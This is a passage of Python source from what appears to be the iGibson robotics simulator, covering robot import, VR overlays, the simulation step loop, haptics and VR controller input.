distance\n\n if min_distance_to_existing_object < min_distance:\n add = False\n break\n\n pos[2] += 0.01 # slighly above to not touch furniture\n p.resetBasePositionAndOrientation(body_id, pos, orn)\n\n # Filter based on collisions with any existing object\n if add:\n p.stepSimulation()\n\n for body_id in body_ids:\n in_collision = len(p.getContactPoints(body_id)) > 0\n if in_collision:\n add = False\n break\n\n if add:\n objects_to_add.append(obj)\n\n for body_id in body_ids:\n p.removeBody(body_id)\n\n p.restoreState(state_id)\n\n p.removeState(state_id)\n\n for obj in objects_to_add:\n self.import_object(obj)\n\n @load_without_pybullet_vis\n def import_robot(self, robot, class_id=SemanticClass.ROBOTS):\n \"\"\"\n Import a robot into the 
simulator\n\n :param robot: Robot\n :param class_id: Class id for rendering semantic segmentation\n :return: pybullet id\n \"\"\"\n assert isinstance(robot, BaseRobot), \"import_robot can only be called with BaseRobot\"\n ids = robot.load()\n visual_objects = []\n link_ids = []\n poses_rot = []\n poses_trans = []\n self.robots.append(robot)\n\n for shape in p.getVisualShapeData(ids[0]):\n id, link_id, type, dimensions, filename, rel_pos, rel_orn, color = shape[:8]\n dynamics_info = p.getDynamicsInfo(id, link_id)\n inertial_pos, inertial_orn = dynamics_info[3], dynamics_info[4]\n rel_pos, rel_orn = p.multiplyTransforms(*p.invertTransform(inertial_pos, inertial_orn), rel_pos, rel_orn)\n # visual meshes frame are transformed from the urdfLinkFrame as origin to comLinkFrame as origin\n\n if type == p.GEOM_MESH:\n filename = filename.decode(\"utf-8\")\n if (filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn)) not in self.visual_objects.keys():\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n )\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))] = (\n len(self.renderer.visual_objects) - 1\n )\n visual_objects.append(\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))]\n )\n link_ids.append(link_id)\n elif type == p.GEOM_SPHERE:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/sphere8.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[dimensions[0] / 0.5, dimensions[0] / 0.5, dimensions[0] / 0.5],\n )\n visual_objects.append(len(self.renderer.get_visual_objects()) - 1)\n link_ids.append(link_id)\n elif type == p.GEOM_CAPSULE or type == p.GEOM_CYLINDER:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[dimensions[1] / 0.5, dimensions[1] / 0.5, dimensions[0]],\n )\n visual_objects.append(len(self.renderer.get_visual_objects()) - 1)\n link_ids.append(link_id)\n elif type == p.GEOM_BOX:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n )\n visual_objects.append(len(self.renderer.get_visual_objects()) - 1)\n link_ids.append(link_id)\n\n if link_id == -1:\n pos, orn = p.getBasePositionAndOrientation(id)\n else:\n pos, orn = p.getLinkState(id, link_id)[:2]\n poses_rot.append(np.ascontiguousarray(quat2rotmat(xyzw2wxyz(orn))))\n poses_trans.append(np.ascontiguousarray(xyz2mat(pos)))\n\n self.renderer.add_robot(\n object_ids=visual_objects,\n link_ids=link_ids,\n pybullet_uuid=ids[0],\n class_id=class_id,\n poses_rot=poses_rot,\n poses_trans=poses_trans,\n dynamic=True,\n robot=robot,\n )\n\n for state in robot.states.values():\n state.initialize(self)\n\n return ids\n\n def add_normal_text(\n self,\n text_data=\"PLACEHOLDER: PLEASE REPLACE!\",\n font_name=\"OpenSans\",\n font_style=\"Regular\",\n font_size=48,\n color=[0, 0, 0],\n pos=[0, 100],\n size=[20, 20],\n scale=1.0,\n background_color=None,\n ):\n \"\"\"\n Creates a Text object to be rendered to a non-VR screen. Returns the text object to the caller,\n so various settings can be changed - eg. 
text content, position, scale, etc.\n :param text_data: starting text to display (can be changed at a later time by set_text)\n :param font_name: name of font to render - same as font folder in iGibson assets\n :param font_style: style of font - one of [regular, italic, bold]\n :param font_size: size of font to render\n :param color: [r, g, b] color\n :param pos: [x, y] position of top-left corner of text box, in percentage across screen\n :param size: [w, h] size of text box in percentage across screen-space axes\n :param scale: scale factor for resizing text\n :param background_color: color of the background in form [r, g, b, a] - background will only appear if this is not None\n \"\"\"\n # Note: For pos/size - (0,0) is bottom-left and (100, 100) is top-right\n # Calculate pixel positions for text\n pixel_pos = [int(pos[0] / 100.0 * self.renderer.width), int(pos[1] / 100.0 * self.renderer.height)]\n pixel_size = [int(size[0] / 100.0 * self.renderer.width), int(size[1] / 100.0 * self.renderer.height)]\n return self.renderer.add_text(\n text_data=text_data,\n font_name=font_name,\n font_style=font_style,\n font_size=font_size,\n color=color,\n pixel_pos=pixel_pos,\n pixel_size=pixel_size,\n scale=scale,\n background_color=background_color,\n render_to_tex=False,\n )\n\n def add_vr_overlay_text(\n self,\n text_data=\"PLACEHOLDER: PLEASE REPLACE!\",\n font_name=\"OpenSans\",\n font_style=\"Regular\",\n font_size=48,\n color=[0, 0, 0],\n pos=[20, 80],\n size=[70, 80],\n scale=1.0,\n background_color=[1, 1, 1, 0.8],\n ):\n \"\"\"\n Creates Text for use in a VR overlay. Returns the text object to the caller,\n so various settings can be changed - eg. text content, position, scale, etc.\n :param text_data: starting text to display (can be changed at a later time by set_text)\n :param font_name: name of font to render - same as font folder in iGibson assets\n :param font_style: style of font - one of [regular, italic, bold]\n :param font_size: size of font to render\n :param color: [r, g, b] color\n :param pos: [x, y] position of top-left corner of text box, in percentage across screen\n :param size: [w, h] size of text box in percentage across screen-space axes\n :param scale: scale factor for resizing text\n :param background_color: color of the background in form [r, g, b, a] - default is semi-transparent white so text is easy to read in VR\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n if not self.vr_overlay_initialized:\n # This function automatically creates a VR text overlay the first time text is added\n self.renderer.gen_vr_hud()\n self.vr_overlay_initialized = True\n\n # Note: For pos/size - (0,0) is bottom-left and (100, 100) is top-right\n # Calculate pixel positions for text\n pixel_pos = [int(pos[0] / 100.0 * self.renderer.width), int(pos[1] / 100.0 * self.renderer.height)]\n pixel_size = [int(size[0] / 100.0 * self.renderer.width), int(size[1] / 100.0 * self.renderer.height)]\n return self.renderer.add_text(\n text_data=text_data,\n font_name=font_name,\n font_style=font_style,\n font_size=font_size,\n color=color,\n pixel_pos=pixel_pos,\n pixel_size=pixel_size,\n scale=scale,\n background_color=background_color,\n render_to_tex=True,\n )\n\n def add_overlay_image(self, image_fpath, width=1, pos=[0, 0, -1]):\n \"\"\"\n Add an image with a given file path to the VR overlay. This image will be displayed\n in addition to any text that the users wishes to display. 
This function returns a handle\n to the VrStaticImageOverlay, so the user can display/hide it at will.\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n return self.renderer.gen_static_overlay(image_fpath, width=width, pos=pos)\n\n def set_hud_show_state(self, show_state):\n \"\"\"\n Shows/hides the main VR HUD.\n :param show_state: whether to show HUD or not\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n self.renderer.vr_hud.set_overlay_show_state(show_state)\n\n def get_hud_show_state(self):\n \"\"\"\n Returns the show state of the main VR HUD.\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n return self.renderer.vr_hud.get_overlay_show_state()\n\n def _non_physics_step(self):\n \"\"\"\n Complete any non-physics steps such as state updates.\n \"\"\"\n # Step all of the particle systems.\n for particle_system in self.particle_systems:\n particle_system.update(self)\n\n # Step the object states in global topological order.\n for state_type in self.object_state_types:\n for obj in self.scene.get_objects_with_state(state_type):\n obj.states[state_type].update()\n\n # Step the object procedural materials based on the updated object states\n for obj in self.scene.get_objects():\n if hasattr(obj, \"procedural_material\") and obj.procedural_material is not None:\n obj.procedural_material.update()\n\n def step_vr(self, print_stats=False):\n \"\"\"\n Step the simulation when using VR. Order of function calls:\n 1) Simulate physics\n 2) Render frame\n 3) Submit rendered frame to VR compositor\n 4) Update VR data for use in the next frame\n \"\"\"\n assert (\n self.scene is not None\n ), \"A scene must be imported before running the simulator. 
Use EmptyScene for an empty scene.\"\n\n # Calculate time outside of step\n outside_step_dur = 0\n if self.frame_end_time is not None:\n outside_step_dur = time.perf_counter() - self.frame_end_time\n # Simulate Physics in PyBullet\n physics_start_time = time.perf_counter()\n for _ in range(self.physics_timestep_num):\n p.stepSimulation()\n physics_dur = time.perf_counter() - physics_start_time\n\n non_physics_start_time = time.perf_counter()\n self._non_physics_step()\n non_physics_dur = time.perf_counter() - non_physics_start_time\n\n # Sync PyBullet bodies to renderer and then render to Viewer\n render_start_time = time.perf_counter()\n self.sync()\n render_dur = time.perf_counter() - render_start_time\n\n # Sleep until last possible Vsync\n pre_sleep_dur = outside_step_dur + physics_dur + non_physics_dur + render_dur\n sleep_start_time = time.perf_counter()\n if pre_sleep_dur < self.non_block_frame_time:\n sleep(self.non_block_frame_time - pre_sleep_dur)\n sleep_dur = time.perf_counter() - sleep_start_time\n\n # Update VR compositor and VR data\n vr_system_start = time.perf_counter()\n # First sync VR compositor - this is where Oculus blocks (as opposed to Vive, which blocks in update_vr_data)\n self.sync_vr_compositor()\n # Note: this should only be called once per frame - use get_vr_events to read the event data list in\n # subsequent read operations\n self.poll_vr_events()\n # This is necessary to fix the eye tracking value for the current frame, since it is multi-threaded\n self.fix_eye_tracking_value()\n # Move user to their starting location\n self.perform_vr_start_pos_move()\n # Update VR data and wait until 3ms before the next vsync\n self.renderer.update_vr_data()\n # Update VR system data - eg. offsets, haptics, etc.\n self.vr_system_update()\n vr_system_dur = time.perf_counter() - vr_system_start\n\n # Calculate final frame duration\n # Make sure it is non-zero for FPS calculation (set to max of 1000 if so)\n frame_dur = max(1e-3, pre_sleep_dur + sleep_dur + vr_system_dur)\n\n # Set variables for data saving and replay\n self.last_physics_timestep = physics_dur\n self.last_render_timestep = render_dur\n self.last_frame_dur = frame_dur\n\n if print_stats:\n print(\"Frame number {} statistics (ms)\".format(self.frame_count))\n print(\"Total out-of-step duration: {}\".format(outside_step_dur * 1000))\n print(\"Total physics duration: {}\".format(physics_dur * 1000))\n print(\"Total non-physics duration: {}\".format(non_physics_dur * 1000))\n print(\"Total render duration: {}\".format(render_dur * 1000))\n print(\"Total sleep duration: {}\".format(sleep_dur * 1000))\n print(\"Total VR system duration: {}\".format(vr_system_dur * 1000))\n print(\"Total frame duration: {} and fps: {}\".format(frame_dur * 1000, 1 / frame_dur))\n print(\n \"Realtime factor: {}\".format(round((self.physics_timestep_num * self.physics_timestep) / frame_dur, 3))\n )\n print(\"-------------------------\")\n\n self.frame_count += 1\n self.frame_end_time = time.perf_counter()\n\n def step(self, print_stats=False):\n \"\"\"\n Step the simulation at self.render_timestep and update positions in renderer\n \"\"\"\n # Call separate step function for VR\n if self.can_access_vr_context:\n self.step_vr(print_stats=print_stats)\n return\n\n for _ in range(self.physics_timestep_num):\n p.stepSimulation()\n\n self._non_physics_step()\n self.sync()\n self.frame_count += 1\n\n def sync(self, force_sync=False):\n \"\"\"\n Update positions in renderer without stepping the simulation. 
Usually used in the reset() function\n \"\"\"\n self.body_links_awake = 0\n for instance in self.renderer.instances:\n if instance.dynamic:\n self.body_links_awake += self.update_position(instance, force_sync=force_sync)\n if (self.use_ig_renderer or self.use_vr_renderer or self.use_simple_viewer) and self.viewer is not None:\n self.viewer.update()\n if self.first_sync:\n self.first_sync = False\n\n def vr_system_update(self):\n \"\"\"\n Updates the VR system for a single frame. This includes moving the vr offset,\n adjusting the user's height based on button input, and triggering haptics.\n \"\"\"\n # Update VR offset using appropriate controller\n if self.vr_settings.touchpad_movement:\n vr_offset_device = \"{}_controller\".format(self.vr_settings.movement_controller)\n is_valid, _, _ = self.get_data_for_vr_device(vr_offset_device)\n if is_valid:\n _, touch_x, touch_y = self.get_button_data_for_controller(vr_offset_device)\n new_offset = calc_offset(\n self, touch_x, touch_y, self.vr_settings.movement_speed, self.vr_settings.relative_movement_device\n )\n self.set_vr_offset(new_offset)\n\n # Adjust user height based on y-axis (vertical direction) touchpad input\n vr_height_device = \"left_controller\" if self.vr_settings.movement_controller == \"right\" else \"right_controller\"\n is_height_valid, _, _ = self.get_data_for_vr_device(vr_height_device)\n if is_height_valid:\n curr_offset = self.get_vr_offset()\n hmd_height = self.get_hmd_world_pos()[2]\n _, _, height_y = self.get_button_data_for_controller(vr_height_device)\n if height_y < -0.7:\n vr_z_offset = -0.01\n if hmd_height + curr_offset[2] + vr_z_offset >= self.vr_settings.height_bounds[0]:\n self.set_vr_offset([curr_offset[0], curr_offset[1], curr_offset[2] + vr_z_offset])\n elif height_y > 0.7:\n vr_z_offset = 0.01\n if hmd_height + curr_offset[2] + vr_z_offset <= self.vr_settings.height_bounds[1]:\n self.set_vr_offset([curr_offset[0], curr_offset[1], curr_offset[2] + vr_z_offset])\n\n # Update haptics for body and hands\n if self.main_vr_robot:\n vr_body_id = self.main_vr_robot.parts[\"body\"].body_id\n vr_hands = [\n (\"left_controller\", self.main_vr_robot.parts[\"left_hand\"]),\n (\"right_controller\", self.main_vr_robot.parts[\"right_hand\"]),\n ]\n\n # Check for body haptics\n wall_ids = self.get_category_ids(\"walls\")\n for c_info in p.getContactPoints(vr_body_id):\n if wall_ids and (c_info[1] in wall_ids or c_info[2] in wall_ids):\n for controller in [\"left_controller\", \"right_controller\"]:\n is_valid, _, _ = self.get_data_for_vr_device(controller)\n if is_valid:\n # Use 90% strength for body to warn user of collision with wall\n self.trigger_haptic_pulse(controller, 0.9)\n\n # Check for hand haptics\n for hand_device, hand_obj in vr_hands:\n is_valid, _, _ = self.get_data_for_vr_device(hand_device)\n if is_valid:\n if len(p.getContactPoints(hand_obj.body_id)) > 0 or (\n hasattr(hand_obj, \"object_in_hand\") and hand_obj.object_in_hand\n ):\n # Only use 30% strength for normal collisions, to help add realism to the experience\n self.trigger_haptic_pulse(hand_device, 0.3)\n\n def register_main_vr_robot(self, vr_robot):\n \"\"\"\n Register the robot representing the VR user.\n \"\"\"\n self.main_vr_robot = vr_robot\n\n def import_behavior_robot(self, bvr_robot):\n \"\"\"\n Import registered behavior robot into the simulator.\n \"\"\"\n assert isinstance(bvr_robot, BehaviorRobot), \"import_robot can only be called with BaseRobot\"\n self.robots.append(bvr_robot)\n for part_name, part_obj in bvr_robot.parts.items():\n 
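# Editor's descriptive note (comment added for clarity, not in the original source): each body part\n            # of the BehaviorRobot is imported as a plain non-PBR object; the ghost-hand and eye-marker helper\n            # visuals below are deliberately imported with shadow_caster=False so they cast no shadows.\n            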
self.import_object(part_obj, use_pbr=False, use_pbr_mapping=False, shadow_caster=True)\n if bvr_robot.use_ghost_hands and part_name in [\"left_hand\", \"right_hand\"]:\n # Ghost hands don't cast shadows\n self.import_object(part_obj.ghost_hand, use_pbr=False, use_pbr_mapping=False, shadow_caster=False)\n if part_name == \"eye\":\n # BREye doesn't cast shadows either\n self.import_object(\n part_obj.head_visual_marker, use_pbr=False, use_pbr_mapping=False, shadow_caster=False\n )\n\n def gen_vr_data(self):\n \"\"\"\n Generates a VrData object containing all of the data required to describe the VR system in the current frame.\n This data is used to power the BehaviorRobot each frame.\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"Unable to get VR data for current frame since VR system is not being used!\")\n\n v = dict()\n for device in VR_DEVICES:\n is_valid, trans, rot = self.get_data_for_vr_device(device)\n device_data = [is_valid, trans.tolist(), rot.tolist()]\n device_data.extend(self.get_device_coordinate_system(device))\n v[device] = device_data\n if device in VR_CONTROLLERS:\n v[\"{}_button\".format(device)] = self.get_button_data_for_controller(device)\n\n # Store final rotations of hands, with model rotation applied\n for hand in [\"right\", \"left\"]:\n # Base rotation quaternion\n base_rot = self.main_vr_robot.parts[\"{}_hand\".format(hand)].base_rot\n # Raw rotation of controller\n controller_rot = v[\"{}_controller\".format(hand)][2]\n # Use dummy translation to calculation final rotation\n final_rot = p.multiplyTransforms([0, 0, 0], controller_rot, [0, 0, 0], base_rot)[1]\n v[\"{}_controller\".format(hand)].append(final_rot)\n\n is_valid, torso_trans, torso_rot = self.get_data_for_vr_tracker(self.vr_settings.torso_tracker_serial)\n v[\"torso_tracker\"] = [is_valid, torso_trans, torso_rot]\n v[\"eye_data\"] = self.get_eye_tracking_data()\n v[\"event_data\"] = self.get_vr_events()\n reset_actions = []\n for controller in VR_CONTROLLERS:\n reset_actions.append(self.query_vr_event(controller, \"reset_agent\"))\n v[\"reset_actions\"] = reset_actions\n v[\"vr_positions\"] = [self.get_vr_pos().tolist(), list(self.get_vr_offset())]\n\n return VrData(v)\n\n def gen_vr_robot_action(self):\n \"\"\"\n Generates an action for the BehaviorRobot to perform based on VrData collected this frame.\n\n Action space (all non-normalized values that will be clipped if they are too large)\n * See BehaviorRobot.py for details on the clipping thresholds for\n Body:\n - 6DOF pose delta - relative to body frame from previous frame\n Eye:\n - 6DOF pose delta - relative to body frame (where the body will be after applying this frame's action)\n Left hand, right hand (in that order):\n - 6DOF pose delta - relative to body frame (same as above)\n - Trigger fraction delta\n - Action reset value\n\n Total size: 28\n \"\"\"\n # Actions are stored as 1D numpy array\n action = np.zeros((28,))\n\n # Get VrData for the current frame\n v = self.gen_vr_data()\n\n # Update body action space\n hmd_is_valid, hmd_pos, hmd_orn, hmd_r = v.query(\"hmd\")[:4]\n torso_is_valid, torso_pos, torso_orn = v.query(\"torso_tracker\")\n vr_body = self.main_vr_robot.parts[\"body\"]\n prev_body_pos, prev_body_orn = vr_body.get_position_orientation()\n inv_prev_body_pos, inv_prev_body_orn = p.invertTransform(prev_body_pos, prev_body_orn)\n\n if self.vr_settings.using_tracked_body:\n if torso_is_valid:\n des_body_pos, des_body_orn = torso_pos, torso_orn\n else:\n des_body_pos, des_body_orn = prev_body_pos, 
prev_body_orn\n else:\n if hmd_is_valid:\n des_body_pos, des_body_orn = hmd_pos, p.getQuaternionFromEuler([0, 0, calc_z_rot_from_right(hmd_r)])\n else:\n des_body_pos, des_body_orn = prev_body_pos, prev_body_orn\n\n body_delta_pos, body_delta_orn = p.multiplyTransforms(\n inv_prev_body_pos, inv_prev_body_orn, des_body_pos, des_body_orn\n )\n action[:3] = np.array(body_delta_pos)\n action[3:6] = np.array(p.getEulerFromQuaternion(body_delta_orn))\n\n # Get new body position so we can calculate correct relative transforms for other VR objects\n clipped_body_delta_pos, clipped_body_delta_orn = vr_body.clip_delta_pos_orn(action[:3], action[3:6])\n clipped_body_delta_orn = p.getQuaternionFromEuler(clipped_body_delta_orn)\n new_body_pos, new_body_orn = p.multiplyTransforms(\n prev_body_pos, prev_body_orn, clipped_body_delta_pos, clipped_body_delta_orn\n )\n # Also calculate its inverse for further local transform calculations\n inv_new_body_pos, inv_new_body_orn = p.invertTransform(new_body_pos, new_body_orn)\n\n # Update action space for other VR objects\n body_relative_parts = [\"right\", \"left\", \"eye\"]\n for part_name in body_relative_parts:\n vr_part = (\n self.main_vr_robot.parts[part_name]\n if part_name == \"eye\"\n else self.main_vr_robot.parts[\"{}_hand\".format(part_name)]\n )\n\n # Process local transform adjustments\n prev_world_pos, prev_world_orn = vr_part.get_position_orientation()\n prev_local_pos, prev_local_orn = vr_part.local_pos, vr_part.local_orn\n _, inv_prev_local_orn = p.invertTransform(prev_local_pos, prev_local_orn)\n if part_name == \"eye\":\n valid, world_pos, world_orn = hmd_is_valid, hmd_pos, hmd_orn\n else:\n valid, world_pos, _ = v.query(\"{}_controller\".format(part_name))[:3]\n # Need rotation of the model so it will appear aligned with the physical controller in VR\n world_orn = v.query(\"{}_controller\".format(part_name))[6]\n\n # Keep in same world position as last frame if controller/tracker data is not valid\n if not valid:\n world_pos, world_orn = prev_world_pos, prev_world_orn\n\n # Get desired local position and orientation transforms\n des_local_pos, des_local_orn = p.multiplyTransforms(\n inv_new_body_pos, inv_new_body_orn, world_pos, world_orn\n )\n\n # Get the delta local orientation in the reference frame of the body\n _, delta_local_orn = p.multiplyTransforms(\n [0, 0, 0],\n des_local_orn,\n [0, 0, 0],\n inv_prev_local_orn,\n )\n delta_local_orn = p.getEulerFromQuaternion(delta_local_orn)\n\n # Get the delta local position in the reference frame of the body\n delta_local_pos = np.array(des_local_pos) - np.array(prev_local_pos)\n\n if part_name == \"eye\":\n action[6:9] = np.array(delta_local_pos)\n action[9:12] = np.array(delta_local_orn)\n elif part_name == \"left\":\n action[12:15] = np.array(delta_local_pos)\n action[15:18] = np.array(delta_local_orn)\n else:\n action[20:23] = np.array(delta_local_pos)\n action[23:26] = np.array(delta_local_orn)\n\n # Process trigger fraction and reset for controllers\n if part_name in [\"right\", \"left\"]:\n prev_trig_frac = vr_part.trigger_fraction\n if valid:\n trig_frac = v.query(\"{}_controller_button\".format(part_name))[0]\n delta_trig_frac = trig_frac - prev_trig_frac\n else:\n delta_trig_frac = 0.0\n if part_name == \"left\":\n action[18] = delta_trig_frac\n else:\n action[26] = delta_trig_frac\n # If we reset, action is 1, otherwise 0\n reset_action = v.query(\"reset_actions\")[0] if part_name == \"left\" else v.query(\"reset_actions\")[1]\n reset_action_val = 1.0 if reset_action else 0.0\n if 
part_name == \"left\":\n action[19] = reset_action_val\n else:\n action[27] = reset_action_val\n\n return action\n\n def sync_vr_compositor(self):\n \"\"\"\n Sync VR compositor.\n \"\"\"\n self.renderer.vr_compositor_update()\n\n def perform_vr_start_pos_move(self):\n \"\"\"\n Sets the VR position on the first step iteration where the hmd tracking is valid. Not to be confused\n with self.set_vr_start_pos, which simply records the desired start position before the simulator starts running.\n \"\"\"\n # Update VR start position if it is not None and the hmd is valid\n # This will keep checking until we can successfully set the start position\n if self.vr_start_pos:\n hmd_is_valid, _, _, _ = self.renderer.vrsys.getDataForVRDevice(\"hmd\")\n if hmd_is_valid:\n offset_to_start = np.array(self.vr_start_pos) - self.get_hmd_world_pos()\n if self.vr_height_offset is not None:\n offset_to_start[2] = self.vr_height_offset\n self.set_vr_offset(offset_to_start)\n self.vr_start_pos = None\n\n def fix_eye_tracking_value(self):\n \"\"\"\n Calculates and fixes eye tracking data to its value during step(). This is necessary, since multiple\n calls to get eye tracking data return different results, due to the SRAnipal multithreaded loop that\n runs in parallel to the iGibson main thread\n \"\"\"\n self.eye_tracking_data = self.renderer.vrsys.getEyeTrackingData()\n\n def gen_assisted_grasping_categories(self):\n \"\"\"\n Generates list of categories that can be grasped using assisted grasping,\n using labels provided in average category specs file.\n \"\"\"\n avg_category_spec = get_ig_avg_category_specs()\n for k, v in avg_category_spec.items():\n if v[\"enable_ag\"]:\n self.assist_grasp_category_allow_list.add(k)\n\n def can_assisted_grasp(self, body_id, c_link):\n \"\"\"\n Checks to see if an object with the given body_id can be grasped. This is done\n by checking its category to see if is in the allowlist.\n \"\"\"\n if (\n not hasattr(self.scene, \"objects_by_id\")\n or body_id not in self.scene.objects_by_id\n or not hasattr(self.scene.objects_by_id[body_id], \"category\")\n or self.scene.objects_by_id[body_id].category == \"object\"\n ):\n mass = p.getDynamicsInfo(body_id, c_link)[0]\n return mass <= self.assist_grasp_mass_thresh\n else:\n return self.scene.objects_by_id[body_id].category in self.assist_grasp_category_allow_list\n\n def poll_vr_events(self):\n \"\"\"\n Returns VR event data as list of lists.\n List is empty if all events are invalid. 
Components of a single event:\n controller: 0 (left_controller), 1 (right_controller)\n button_idx: any valid idx in EVRButtonId enum in openvr.h header file\n press: 0 (unpress), 1 (press)\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n self.vr_event_data = self.renderer.vrsys.pollVREvents()\n # Enforce store_first_button_press_per_frame option, if user has enabled it\n if self.vr_settings.store_only_first_event_per_button:\n temp_event_data = []\n # Make sure we only store the first (button, press) combo of each type\n event_set = set()\n for ev_data in self.vr_event_data:\n controller, button_idx, _ = ev_data\n key = (controller, button_idx)\n if key not in event_set:\n temp_event_data.append(ev_data)\n event_set.add(key)\n self.vr_event_data = temp_event_data[:]\n\n return self.vr_event_data\n\n def get_vr_events(self):\n \"\"\"\n Returns the VR events processed by the simulator\n \"\"\"\n return self.vr_event_data\n\n def get_button_for_action(self, action):\n \"\"\"\n Returns (button, state) tuple corresponding to an action\n :param action: an action name listed in \"action_button_map\" dictionary for the current device in the vr_config.yml\n \"\"\"\n return (\n None\n if action not in self.vr_settings.action_button_map\n else tuple(self.vr_settings.action_button_map[action])\n )\n\n def query_vr_event(self, controller, action):\n \"\"\"\n Queries system for a VR event, and returns true if that event happened this frame\n :param controller: device to query for - can be left_controller or right_controller\n :param action: an action name listed in \"action_button_map\" dictionary for the current device in the vr_config.yml\n \"\"\"\n # Return false if any of input parameters are invalid\n if (\n controller not in [\"left_controller\", \"right_controller\"]\n or action not in self.vr_settings.action_button_map.keys()\n ):\n return False\n\n # Search through event list to try to find desired event\n controller_id = 0 if controller == \"left_controller\" else 1\n button_idx, press_id = self.vr_settings.action_button_map[action]\n for ev_data in self.vr_event_data:\n if controller_id == ev_data[0] and button_idx == ev_data[1] and press_id == ev_data[2]:\n return True\n\n # Return false if event was not found this frame\n return False\n\n def get_data_for_vr_device(self, device_name):\n \"\"\"\n Call this after step - returns all VR device data for a specific device\n Returns is_valid (indicating validity of data), translation and rotation in Gibson world space\n :param device_name: can be hmd, left_controller or right_controller\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n # Use fourth variable in list to get actual hmd position in space\n is_valid, translation, rotation, _ = self.renderer.vrsys.getDataForVRDevice(device_name)\n if not is_valid:\n translation = np.array([0, 0, 0])\n rotation = np.array([0, 0, 0, 1])\n return [is_valid, translation, rotation]\n\n def get_data_for_vr_tracker(self, tracker_serial_number):\n \"\"\"\n Returns the data for a tracker with a specific serial number. 
This number can be found\n by looking in the SteamVR device information.\n :param tracker_serial_number: the serial number of the tracker\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n if not tracker_serial_number:\n return [False, [0, 0, 0], [0, 0, 0, 0]]\n\n tracker_data = self.renderer.vrsys.getDataForVRTracker(tracker_serial_number)\n # Set is_valid to false, and assume the user will check for invalid data\n if not tracker_data:\n return [False, np.array([0, 0, 0]), np.array([0, 0, 0, 1])]\n\n is_valid, translation, rotation = tracker_data\n return [is_valid, translation, rotation]\n\n def get_hmd_world_pos(self):\n \"\"\"\n Get world position of HMD without offset\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n _, _, _, hmd_world_pos = self.renderer.vrsys.getDataForVRDevice(\"hmd\")\n return hmd_world_pos\n\n def get_button_data_for_controller(self, controller_name):\n \"\"\"\n Call this after getDataForVRDevice - returns analog data for a specific controller\n Returns trigger_fraction, touchpad finger position x, touchpad finger position y\n Data is only valid if isValid is true from previous call to getDataForVRDevice\n Trigger data: 1 (closed) <------> 0 (open)\n Analog data: X: -1 (left) <-----> 1 (right) and Y: -1 (bottom) <------> 1 (top)\n :param controller_name: one of left_controller or right_controller\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n # Test for validity when acquiring button data\n if self.get_data_for_vr_device(controller_name)[0]:\n trigger_fraction, touch_x, touch_y = self.renderer.vrsys.getButtonDataForController(controller_name)\n else:\n trigger_fraction, touch_x, touch_y = 0.0, 0.0, 0.0\n return [trigger_fraction, touch_x, touch_y]\n\n def get_scroll_input(self):\n \"\"\"\n Gets scroll input. This uses the non-movement-controller, and determines whether\n the user wants to scroll by testing if they have pressed the touchpad, while keeping\n their finger on the left/right of the pad. Return True for up and False for down (-1 for no scroll)\n \"\"\"\n mov_controller = self.vr_settings.movement_controller\n other_controller = \"right\" if mov_controller == \"left\" else \"left\"\n other_controller = \"{}_controller\".format(other_controller)\n # Data indicating whether user has pressed top or bottom of the touchpad\n _, touch_x, _ = self.renderer.vrsys.getButtonDataForController(other_controller)\n # Detect no touch in extreme regions of x axis\n if touch_x > 0.7 and touch_x <= 1.0:\n return 1\n elif touch_x < -0.7 and touch_x >= -1.0:\n return 0\n else:\n return -1\n\n def get_eye_tracking_data(self):\n \"\"\"\n Returns eye tracking data as list of lists. 
